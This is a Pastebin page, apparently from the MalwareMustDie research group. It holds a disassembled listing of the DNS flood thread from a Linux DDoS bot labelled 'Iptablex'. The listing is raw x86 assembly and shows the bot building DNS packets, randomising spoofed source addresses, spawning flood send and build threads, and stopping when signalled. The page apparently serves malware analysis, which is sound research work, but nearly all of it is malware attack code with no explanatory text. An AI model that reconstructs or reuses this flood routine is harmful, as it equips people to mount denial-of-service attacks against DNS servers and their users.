API tools faq
paste
Advertisement
MalwareMustDie

DNS Flood Thread | China DDoSer

MalwareMustDie
Jun 16th, 2014
2,779
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 23.66 KB | None | 0 0
raw download clone embed print report
  1. ; DNS Flood thread #MalwareMustDie - @unixfreaxjp /malware/Iptablex]$ date
  2. ; Mon Jun 16 14:08:17 JST 2014
  3.  
  4. .text:08049080                 public DnsFloodThread
  5. .text:08049080 DnsFloodThread  proc near
  6. .text:08049080 var_C8          = dword ptr -0C8h
  7. .text:08049080 var_C4          = dword ptr -0C4h
  8. .text:08049080 var_C0          = dword ptr -0C0h
  9. .text:08049080 var_BC          = dword ptr -0BCh
  10. .text:08049080 var_B8          = dword ptr -0B8h
  11. .text:08049080 var_B4          = dword ptr -0B4h
  12. .text:08049080 var_B0          = dword ptr -0B0h
  13. .text:08049080 var_AC          = dword ptr -0ACh
  14. .text:08049080 var_A8          = dword ptr -0A8h
  15. .text:08049080 var_A0          = dword ptr -0A0h
  16. .text:08049080 var_9C          = dword ptr -9Ch
  17. .text:08049080 var_98          = dword ptr -98h
  18. .text:08049080 var_94          = dword ptr -94h
  19. .text:08049080 var_90          = dword ptr -90h
  20. .text:08049080 var_8C          = dword ptr -8Ch
  21. .text:08049080 var_88          = dword ptr -88h
  22. .text:08049080 var_84          = byte ptr -84h
  23. .text:08049080 var_80          = dword ptr -80h
  24. .text:08049080 var_7C          = word ptr -7Ch
  25. .text:08049080 var_7A          = word ptr -7Ah
  26. .text:08049080 var_78          = dword ptr -78h
  27. .text:08049080 var_74          = word ptr -74h
  28. .text:08049080 var_70          = dword ptr -70h
  29. .text:08049080 var_64          = dword ptr -64h
  30. .text:08049080 var_60          = dword ptr -60h
  31. .text:08049080 var_5C          = dword ptr -5Ch
  32. .text:08049080 var_58          = dword ptr -58h
  33. .text:08049080 var_54          = dword ptr -54h
  34. .text:08049080 var_50          = byte ptr -50h
  35. .text:08049080 var_4C          = dword ptr -4Ch
  36. .text:08049080 var_48          = dword ptr -48h
  37. .text:08049080 var_44          = dword ptr -44h
  38. .text:08049080 var_40          = dword ptr -40h
  39. .text:08049080 var_3C          = dword ptr -3Ch
  40. .text:08049080 var_38          = dword ptr -38h
  41. .text:08049080 var_34          = dword ptr -34h
  42. .text:08049080 var_30          = dword ptr -30h
  43. .text:08049080 var_2C          = dword ptr -2Ch
  44. .text:08049080 var_28          = dword ptr -28h
  45. .text:08049080 var_24          = dword ptr -24h
  46. .text:08049080 var_20          = dword ptr -20h
  47. .text:08049080 var_1C          = dword ptr -1Ch
  48. .text:08049080 var_18          = dword ptr -18h
  49. .text:08049080 var_14          = dword ptr -14h
  50. .text:08049080 var_10          = dword ptr -10h
  51. .text:08049080 arg_0           = dword ptr  8
  52. .text:08049080                 push    ebp
  53. .text:08049081                 mov     ecx, 10h
  54. .text:08049086                 mov     ebp, esp
  55. .text:08049088                 push    edi
  56. .text:08049089                 push    esi
  57. .text:0804908A                 push    ebx
  58. .text:0804908B                 lea     eax, [ebp+var_4C]
  59. .text:0804908E                 sub     esp, 0BCh       ; fd
  60. .text:08049094                 mov     esi, [ebp+arg_0]
  61. .text:08049097                 mov     [ebp+var_B4], eax
  62. .text:0804909D                 mov     edi, [ebp+var_B4]
  63. .text:080490A3                 xor     eax, eax
  64. .text:080490A5                 cld
  65. .text:080490A6                 lea     ebx, [esi+10h]
  66. .text:080490A9                 rep stosd
  67. .text:080490AB                 mov     eax, [esi+10h]
  68. .text:080490AE                 mov     [ebp+var_4C], eax
  69. .text:080490B1                 mov     eax, [ebx+4]
  70. .text:080490B4                 mov     [ebp+var_48], eax
  71. .text:080490B7                 mov     eax, [ebx+8]
  72. .text:080490BA                 mov     [ebp+var_44], eax
  73. .text:080490BD                 mov     eax, [ebx+0Ch]
  74. .text:080490C0                 mov     [ebp+var_40], eax
  75. .text:080490C3                 mov     eax, [ebx+10h]
  76. .text:080490C6                 mov     [ebp+var_3C], eax
  77. .text:080490C9                 mov     eax, [ebx+14h]
  78. .text:080490CC                 mov     [ebp+var_38], eax
  79. .text:080490CF                 mov     eax, [ebx+18h]
  80. .text:080490D2                 mov     [ebp+var_34], eax
  81. .text:080490D5                 mov     eax, [ebx+1Ch]
  82. .text:080490D8                 mov     [ebp+var_30], eax
  83. .text:080490DB                 mov     eax, [ebx+20h]
  84. .text:080490DE                 mov     [ebp+var_2C], eax
  85. .text:080490E1                 mov     eax, [ebx+24h]
  86. .text:080490E4                 mov     [ebp+var_28], eax
  87. .text:080490E7                 mov     eax, [ebx+28h]
  88. .text:080490EA                 mov     [ebp+var_24], eax
  89. .text:080490ED                 mov     eax, [ebx+2Ch]
  90. .text:080490F0                 mov     [ebp+var_20], eax
  91. .text:080490F3                 mov     eax, [ebx+30h]
  92. .text:080490F6                 mov     [ebp+var_1C], eax
  93. .text:080490F9                 mov     eax, [ebx+34h]
  94. .text:080490FC                 mov     [ebp+var_18], eax
  95. .text:080490FF                 mov     eax, [ebx+38h]
  96. .text:08049102                 mov     [ebp+var_14], eax
  97. .text:08049105                 mov     eax, [ebx+3Ch]
  98. .text:08049108                 mov     [esp+0C8h+var_C0], 60h
  99. .text:08049110                 mov     [esp+0C8h+var_C4], 0
  100. .text:08049118                 mov     [ebp+var_10], eax
  101. .text:0804911B                 lea     eax, [ebp+var_AC]
  102. .text:08049121                 mov     [esp+0C8h+var_C8], eax
  103. .text:08049124                 call    memset
  104. .text:08049129                 mov     eax, [esi]
  105. .text:0804912B                 mov     ecx, ebx
  106. .text:0804912D                 mov     [ebp+var_78], eax
  107. .text:08049130                 mov     eax, [esi+4]
  108. .text:08049133                 mov     edi, [esi+64h]
  109. .text:08049136                 mov     [ebp+var_74], ax
  110. .text:0804913A
  111. .text:0804913A loc_804913A:
  112. .text:0804913A                 mov     eax, [ecx]
  113. .text:0804913C                 add     ecx, 4
  114. .text:0804913F                 lea     edx, [eax-1010101h]
  115. .text:08049145                 not     eax
  116. .text:08049147                 and     edx, eax
  117. .text:08049149                 and     edx, 80808080h
  118. .text:0804914F                 jz      short loc_804913A
  119. .text:08049151                 test    edx, 8080h
  120. .text:08049157                 jnz     short loc_804915F
  121. .text:08049159                 shr     edx, 10h
  122. .text:0804915C                 add     ecx, 2
  123. .text:0804915F
  124. .text:0804915F loc_804915F:    
  125. .text:0804915F                 add     dl, dl
  126. .text:08049161                 sbb     ecx, 3
  127. .text:08049164                 sub     ecx, ebx
  128. .text:08049166                 add     ecx, 2
  129. .text:08049169                 mov     [ebp+var_B0], ecx
  130. .text:0804916F                 movzx   eax, word ptr [ebp+var_B0]
  131. .text:08049176                 mov     [esp+0C8h+var_C8], 0
  132. .text:0804917D                 add     eax, 2Dh
  133. .text:08049180                 mov     word ptr [ebp+var_94+2], ax
  134. .text:08049187                 call    time
  135. .text:0804918C                 mov     [ebp+var_A0], eax
  136. .text:08049192                 mov     eax, dword ptr ds:g_mainsrvinfo+10h
  137. .text:08049197                 mov     [esp+0C8h+var_C8], eax
  138. .text:0804919A                 call    GetSocketIp
  139. .text:0804919F                 lea     edx, [esi+50h]
  140. .text:080491A2                 mov     [ebp+var_98], 0
  141. .text:080491AC                 mov     [ebp+var_84], 0
  142. .text:080491B3                 mov     [ebp+var_50], 1
  143. .text:080491B7                 mov     ecx, eax
  144. .text:080491B9                 ror     cx, 8
  145. .text:080491BD                 ror     ecx, 10h
  146. .text:080491C0                 ror     cx, 8
  147. .text:080491C4                 mov     [ebp+var_9C], ecx
  148. .text:080491CA                 mov     eax, [esi+50h]
  149. .text:080491CD                 mov     [ebp+var_60], eax
  150. .text:080491D0                 mov     eax, [edx+4]
  151. .text:080491D3                 mov     [ebp+var_5C], eax
  152. .text:080491D6                 mov     eax, [edx+8]
  153. .text:080491D9                 mov     [ebp+var_58], eax
  154. .text:080491DC                 mov     eax, [edx+0Ch]
  155. .text:080491DF                 mov     [ebp+var_54], eax
  156. .text:080491E2                 test    byte ptr [esi+8], 4
  157. .text:080491E6                 jnz     loc_80492E0
  158. .text:080491EC                 cmp     edi, ecx
  159. .text:080491EE                 ja      loc_80492C0
  160. .text:080491F4
  161. .text:080491F4 loc_80491F4:
  162. .text:080491F4                 mov     eax, dword ptr ds:g_mainsrvinfo+10h
  163. .text:080491F9                 mov     [esp+0C8h+var_C8], eax
  164. .text:080491FC                 call    GetSocketIp
  165. .text:08049201                 mov     [ebp+var_98], 0
  166. .text:0804920B                 ror     ax, 8
  167. .text:0804920F                 ror     eax, 10h
  168. .text:08049212                 ror     ax, 8
  169. .text:08049216                 mov     [ebp+var_9C], eax
  170. .text:0804921C
  171. .text:0804921C loc_804921C:
  172. .text:0804921C                 mov     ebx, [esi+68h]
  173. .text:0804921F                 mov     edi, [ebp+var_98]
  174. .text:08049225                 mov     [esp+0C8h+var_C8], 0
  175. .text:0804922C                 call    time
  176. .text:08049231                 lea     ebx, [ebx+eax+2]
  177. .text:08049235                 movzx   eax, word ptr [esi+6Ch]
  178. .text:08049239                 mov     [ebp+var_80], ebx
  179. .text:0804923C                 mov     [ebp+var_7C], ax
  180. .text:08049240                 movzx   eax, word ptr [esi+6Eh]
  181. .text:08049244                 mov     [ebp+var_7A], ax
  182. .text:08049248                 lea     eax, [ebp+var_AC]
  183. .text:0804924E                 mov     [esi+80h], eax
  184. .text:08049254                 lea     eax, [esi+78h]
  185. .text:08049257                 mov     [esp+0C8h+var_BC], eax
  186. .text:0804925B                 mov     [esp+0C8h+var_C0], 0
  187. .text:08049263                 mov     [esp+0C8h+var_C4], 1
  188. .text:0804926B                 mov     [esp+0C8h+var_C8], 1
  189. .text:08049272                 call    socketpair
  190. .text:08049277                 test    eax, eax
  191. .text:08049279                 jnz     short loc_80492B1
  192. .text:0804927B                 call    fork
  193. .text:08049280                 cmp     eax, 0
  194. .text:08049283                 jz      short loc_80492FB
  195. .text:08049285                 jle     loc_8049678
  196. .text:0804928B                 mov     [esi+74h], eax
  197. .text:0804928E                 mov     [esp+0C8h+var_C0], 0
  198. .text:08049296                 mov     [esp+0C8h+var_C4], 0
  199. .text:0804929E                 mov     [esp+0C8h+var_C8], eax
  200. .text:080492A1                 call    waitpid
  201. .text:080492A6                 lea     eax, [ebp+var_60]
  202. .text:080492A9                 mov     [esp+0C8h+var_C8], eax
  203. .text:080492AC                 call    DeleteTask
  204. .text:080492B1
  205. .text:080492B1 loc_80492B1:  
  206. .text:080492B1                 mov     [esp+0C8h+var_C8], 0
  207. .text:080492B8                 call    pthread_exit
  208. .text:080492BD                 lea     esi, [esi+0]
  209. .text:080492C0
  210. .text:080492C0 loc_80492C0:
  211. .text:080492C0                 mov     eax, dword ptr ds:g_mainsrvinfo+128h
  212. .text:080492C5                 cmp     ecx, eax
  213. .text:080492C7                 jnb     short loc_80492CF
  214. .text:080492C9                 mov     [ebp+var_9C], eax
  215. .text:080492CF
  216. .text:080492CF loc_80492CF:  
  217. .text:080492CF                 mov     eax, dword ptr ds:g_mainsrvinfo+12Ch
  218. .text:080492D4                 cmp     edi, eax
  219. .text:080492D6                 jbe     short loc_80492E0
  220. .text:080492D8                 mov     edi, eax
  221. .text:080492DA                 lea     esi, [esi+0]
  222. .text:080492E0
  223. .text:080492E0 loc_80492E0:  
  224. .text:080492E0                 mov     eax, [ebp+var_9C]
  225. .text:080492E6                 cmp     edi, eax
  226. .text:080492E8                 jbe     loc_80491F4
  227. .text:080492EE                 sub     edi, eax
  228. .text:080492F0                 mov     [ebp+var_98], edi
  229. .text:080492F6                 jmp     loc_804921C
  230. .text:080492FB
  231. .text:080492FB loc_80492FB:  
  232. .text:080492FB                 lea     eax, [ebp+var_AC]
  233. .text:08049301                 mov     ds:rmsg, eax
  234. .text:08049306                 mov     [esp+0C8h+var_C4], offset stopatk
  235. .text:0804930E                 mov     [esp+0C8h+var_C8], 0E8h
  236. .text:08049315                 call    ssignal
  237. .text:0804931A                 mov     eax, [esi+7Ch]
  238. .text:0804931D                 mov     [esp+0C8h+var_C8], eax
  239. .text:08049320                 call    close
  240. .text:08049325                 mov     eax, [ebp+var_B0]
  241. .text:0804932B                 add     eax, 2
  242. .text:0804932E                 mov     [esp+0C8h+var_C8], eax
  243. .text:08049331                 call    malloc
  244. .text:08049336                 mov     [ebp+var_90], 0
  245. .text:08049340                 mov     [ebp+var_AC], 0
  246. .text:0804934A                 mov     [ebp+var_A8], 0
  247. .text:08049354                 mov     [ebp+var_88], eax
  248. .text:0804935A                 movzx   eax, word ptr [ebp+var_94+2]
  249. .text:08049361                 imul    ebx, eax, 1389h
  250. .text:08049367                 mov     [esp+0C8h+var_C8], ebx
  251. .text:0804936A                 call    malloc
  252. .text:0804936F                 mov     [esp+0C8h+var_C8], ebx
  253. .text:08049372                 mov     [ebp+var_AC], eax
  254. .text:08049378                 call    malloc
  255. .text:0804937D                 mov     [ebp+var_A8], eax
  256. .text:08049383                 mov     eax, [ebp+var_88]
  257. .text:08049389                 mov     [esp+0C8h+var_C4], eax
  258. .text:0804938D                 lea     eax, [ebp+var_4C]
  259. .text:08049390                 mov     [esp+0C8h+var_C8], eax
  260. .text:08049393                 call    dmpacket
  261. .text:08049398                 mov     word ptr [ebp+var_94], ax
  262. .text:0804939F                 mov     eax, [ebp+var_AC]
  263. .text:080493A5                 test    eax, eax
  264. .text:080493A7                 jz      loc_804963E
  265. .text:080493AD                 mov     ecx, [ebp+var_A8]
  266. .text:080493B3                 test    ecx, ecx
  267. .text:080493B5                 jz      loc_8049636
  268. .text:080493BB                 mov     edx, [ebp+var_88]
  269. .text:080493C1                 test    edx, edx
  270. .text:080493C3                 jz      loc_8049636
  271. .text:080493C9                 mov     [esp+0C8h+var_C0], ebx
  272. .text:080493CD                 mov     [esp+0C8h+var_C4], 0
  273. .text:080493D5                 mov     [esp+0C8h+var_C8], eax
  274. .text:080493D8                 call    memset
  275. .text:080493DD                 mov     eax, [ebp+var_A8]
  276. .text:080493E3                 mov     [esp+0C8h+var_C0], ebx
  277. .text:080493E7                 xor     ebx, ebx
  278. .text:080493E9                 mov     [esp+0C8h+var_C4], 0
  279. .text:080493F1                 mov     [esp+0C8h+var_C8], eax
  280. .text:080493F4                 call    memset
  281. .text:080493F9                 lea     esi, [esi+0]
  282. .text:08049400
  283. .text:08049400 loc_8049400:  
  284. .text:08049400                 mov     eax, [ebp+var_78]
  285. .text:08049403                 mov     [esp+0C8h+var_C0], eax
  286. .text:08049407                 mov     eax, [ebp+var_88]
  287. .text:0804940D                 mov     [esp+0C8h+var_C4], eax
  288. .text:08049411                 movzx   eax, word ptr [ebp+var_94+2]
  289. .text:08049418                 imul    eax, ebx
  290. .text:0804941B                 add     eax, [ebp+var_AC]
  291. .text:08049421                 mov     [esp+0C8h+var_C8], eax
  292. .text:08049424                 call    dnspacket
  293. .text:08049429                 mov     eax, [ebp+var_78]
  294. .text:0804942C                 mov     [esp+0C8h+var_C0], eax
  295. .text:08049430                 mov     eax, [ebp+var_88]
  296. .text:08049436                 mov     [esp+0C8h+var_C4], eax
  297. .text:0804943A                 movzx   eax, word ptr [ebp+var_94+2]
  298. .text:08049441                 imul    eax, ebx
  299. .text:08049444                 add     eax, [ebp+var_A8]
  300. .text:0804944A                 mov     [esp+0C8h+var_C8], eax
  301. .text:0804944D                 call    dnspacket
  302. .text:08049452                 mov     eax, [ebp+var_98]
  303. .text:08049458                 cmp     eax, 1
  304. .text:0804945B                 jbe     short loc_8049467
  305. .text:0804945D                 mov     [esp+0C8h+var_C8], eax
  306. .text:08049460                 call    Hbrand
  307. .text:08049465                 mov     edi, eax
  308. .text:08049467
  309. .text:08049467 loc_8049467:  
  310. .text:08049467                 mov     eax, edi
  311. .text:08049469                 add     eax, [ebp+var_9C]
  312. .text:0804946F                 ror     ax, 8
  313. .text:08049473                 ror     eax, 10h
  314. .text:08049476                 ror     ax, 8
  315. .text:0804947A                 mov     [esp+0C8h+var_BC], eax
  316. .text:0804947E                 lea     eax, [ebp+var_94]
  317. .text:08049484                 mov     [esp+0C8h+var_C0], eax
  318. .text:08049488                 mov     eax, [ebp+var_88]
  319. .text:0804948E                 mov     [esp+0C8h+var_C4], eax
  320. .text:08049492                 movzx   eax, word ptr [ebp+var_94+2]
  321. .text:08049499                 imul    eax, ebx
  322. .text:0804949C                 add     ebx, 1
  323. .text:0804949F                 add     eax, [ebp+var_AC]
  324. .text:080494A5                 mov     [esp+0C8h+var_C8], eax
  325. .text:080494A8                 call    ChangeDns
  326. .text:080494AD                 cmp     ebx, 1388h
  327. .text:080494B3                 jnz     loc_8049400
  328. .text:080494B9                 mov     eax, [ebp+var_AC]
  329. .text:080494BF                 lea     ebx, [ebp+var_70]
  330. .text:080494C2                 mov     [ebp+var_50], 1
  331. .text:080494C6                 lea     edi, [ebp+var_64]
  332. .text:080494C9                 mov     [ebp+var_8C], eax
  333. .text:080494CF
  334. .text:080494CF loc_80494CF:      
  335. .text:080494CF                 mov     [esp+0C8h+var_C8], 2710h
  336. .text:080494D6                 call    usleep
  337. .text:080494DB                 lea     eax, [ebp+var_AC]
  338. .text:080494E1                 mov     [esp+0C8h+var_C0], ebx
  339. .text:080494E5                 add     ebx, 4
  340. .text:080494E8                 mov     [esp+0C8h+var_B8], 1
  341. .text:080494F0                 mov     [esp+0C8h+var_BC], 0
  342. .text:080494F8                 mov     [esp+0C8h+var_C4], eax
  343. .text:080494FC                 mov     [esp+0C8h+var_C8], offset DnsFloodSendThread
  344. .text:08049503                 call    HbCreateThread
  345. .text:08049508                 cmp     ebx, edi
  346. .text:0804950A                 jnz     short loc_80494CF
  347. .text:0804950C                 mov     [esp+0C8h+var_C8], 4E20h
  348. .text:08049513                 call    usleep
  349. .text:08049518                 lea     eax, [ebp+var_AC]
  350. .text:0804951E                 mov     [esp+0C8h+var_B8], 1
  351. .text:08049526                 mov     [esp+0C8h+var_BC], 1
  352. .text:0804952E                 mov     [esp+0C8h+var_C0], ebx
  353. .text:08049532                 mov     [esp+0C8h+var_C4], eax
  354. .text:08049536                 mov     [esp+0C8h+var_C8], offset DnsFloodBuildThread
  355. .text:0804953D                 call    HbCreateThread
  356. .text:08049542                 cmp     [ebp+var_50], 0
  357. .text:08049546                 jnz     short loc_8049588
  358. .text:08049548                 jmp     short loc_804959B
  359. .text:0804954A                 align 10h
  360. .text:08049550
  361. .text:08049550 loc_8049550:        
  362. .text:08049550                 movzx   eax, [ebp+var_7C]
  363. .text:08049554                 imul    eax, 0F4240h
  364. .text:0804955A                 mov     [esp+0C8h+var_C8], eax
  365. .text:0804955D                 call    usleep
  366. .text:08049562                 movzx   eax, [ebp+var_7A]
  367. .text:08049566                 mov     [ebp+var_84], 1
  368. .text:0804956D                 imul    eax, 0F4240h
  369. .text:08049573                 mov     [esp+0C8h+var_C8], eax
  370. .text:08049576                 call    usleep
  371. .text:0804957B                 cmp     [ebp+var_50], 0
  372. .text:0804957F                 mov     [ebp+var_84], 0
  373. .text:08049586                 jz      short loc_804959B
  374. .text:08049588
  375. .text:08049588 loc_8049588:  
  376. .text:08049588                 mov     ebx, [ebp+var_80]
  377. .text:0804958B                 mov     [esp+0C8h+var_C8], 0
  378. .text:08049592                 call    time
  379. .text:08049597                 cmp     ebx, eax
  380. .text:08049599                 jg      short loc_8049550
  381. .text:0804959B
  382. .text:0804959B loc_804959B:
  383. .text:0804959B                 mov     [ebp+var_50], 0
  384. .text:0804959F                 xor     edi, edi
  385. .text:080495A1                 xor     ebx, ebx
  386. .text:080495A3                 mov     [esp+0C8h+var_C8], 186A0h
  387. .text:080495AA                 call    usleep
  388. .text:080495AF
  389. .text:080495AF loc_80495AF:  
  390. .text:080495AF                 mov     eax, [ebp+ebx*4+var_70]
  391. .text:080495B3                 mov     [esp+0C8h+var_C4], 64h
  392. .text:080495BB                 mov     [esp+0C8h+var_C8], eax
  393. .text:080495BE                 call    HbCheckThread
  394. .text:080495C3                 test    eax, eax
  395. .text:080495C5                 jz      short loc_80495D0
  396. .text:080495C7                 cmp     edi, 1Dh
  397. .text:080495CA                 jbe     loc_8049684
  398. .text:080495D0
  399. .text:080495D0 loc_80495D0:  
  400. .text:080495D0                 add     ebx, 1
  401. .text:080495D3                 cmp     ebx, 2
  402. .text:080495D6                 jg      short loc_80495DC
  403. .text:080495D8                 xor     edi, edi
  404. .text:080495DA                 jmp     short loc_80495AF
  405. .text:080495DC
  406. .text:080495DC loc_80495DC:    
  407. .text:080495DC                 xor     ebx, ebx
  408. .text:080495DE
  409. .text:080495DE loc_80495DE:  
  410. .text:080495DE                 mov     eax, [ebp+ebx*4+var_70]
  411. .text:080495E2                 add     ebx, 1
  412. .text:080495E5                 mov     [esp+0C8h+var_C8], eax
  413. .text:080495E8                 call    HbExitThread
  414. .text:080495ED                 cmp     ebx, 3
  415. .text:080495F0                 jnz     short loc_80495DE
  416. .text:080495F2                 xor     bl, bl
  417. .text:080495F4                 jmp     short loc_804960A
  418. .text:080495F6
  419. .text:080495F6 loc_80495F6:  
  420. .text:080495F6                 cmp     ebx, 1Eh
  421. .text:080495F9                 jz      short loc_8049621
  422. .text:080495FB                 add     ebx, 1
  423. .text:080495FE                 mov     [esp+0C8h+var_C8], 186A0h
  424. .text:08049605                 call    usleep
  425. .text:0804960A
  426. .text:0804960A loc_804960A:  
  427. .text:0804960A                 mov     eax, [ebp+var_64]
  428. .text:0804960D                 mov     [esp+0C8h+var_C4], 64h
  429. .text:08049615                 mov     [esp+0C8h+var_C8], eax
  430. .text:08049618                 call    HbCheckThread
  431. .text:0804961D                 test    eax, eax
  432. .text:0804961F                 jnz     short loc_80495F6
  433. .text:08049621
  434. .text:08049621 loc_8049621:    
  435. .text:08049621                 mov     eax, [ebp+var_64]
  436. .text:08049624                 mov     [esp+0C8h+var_C8], eax
  437. .text:08049627                 call    HbExitThread
  438. .text:0804962C                 mov     eax, [ebp+var_AC]
  439. .text:08049632                 test    eax, eax
  440. .text:08049634                 jz      short loc_804963E
  441. .text:08049636
  442. .text:08049636 loc_8049636:    
  443. .text:08049636                 mov     [esp+0C8h+var_C8], eax
  444. .text:08049639                 call    free
  445. .text:0804963E
  446. .text:0804963E loc_804963E:
  447. .text:0804963E                 mov     eax, [ebp+var_A8]
  448. .text:08049644                 test    eax, eax
  449. .text:08049646                 jz      short loc_8049650
  450. .text:08049648                 mov     [esp+0C8h+var_C8], eax
  451. .text:0804964B                 call    free
  452. .text:08049650
  453. .text:08049650 loc_8049650:  
  454. .text:08049650                 mov     eax, [ebp+var_88]
  455. .text:08049656                 test    eax, eax
  456. .text:08049658                 jz      short loc_8049662
  457. .text:0804965A                 mov     [esp+0C8h+var_C8], eax
  458. .text:0804965D                 call    free
  459. .text:08049662
  460. .text:08049662 loc_8049662:  
  461. .text:08049662                 mov     dword ptr [esi+80h], 0
  462. .text:0804966C                 mov     [esp+0C8h+var_C8], 0
  463. .text:08049673                 call    exit
  464. .text:08049678
  465. .text:08049678 loc_8049678:  
  466. .text:08049678                 mov     [esp+0C8h+var_C8], 0
  467. .text:0804967F                 call    exit
  468. .text:08049684
  469. .text:08049684 loc_8049684:        
  470. .text:08049684                 add     edi, 1
  471. .text:08049687                 mov     [esp+0C8h+var_C8], 186A0h
  472. .text:0804968E                 call    usleep
  473. .text:08049693                 jmp     loc_80495AF
  474. .text:08049693 DnsFloodThread  endp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!